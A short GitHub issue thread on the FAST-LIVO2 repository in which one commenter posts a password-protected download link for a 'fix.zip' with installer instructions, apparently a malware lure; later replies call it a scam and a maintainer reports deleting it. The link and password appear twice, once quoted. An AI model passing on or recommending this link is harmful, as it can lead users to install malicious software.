### ISSUE TITLE
Exciting work

### ISSUE THREAD

**Issue by FengyuGuo** [hku-mars/FAST-LIVO2#14]
Can't wait to see the release of the code.

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by 85256638** [comment]
> Download https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file password: changeme In the installer menu, select "gcc."

What is this? Can you clarify?

**Comment by gc625-kodifly** [comment]
Scam, dont download

**Comment by xuankuzcr** [comment]
I think this is a dangerous link, so I deleted the comment from @PiaoR.
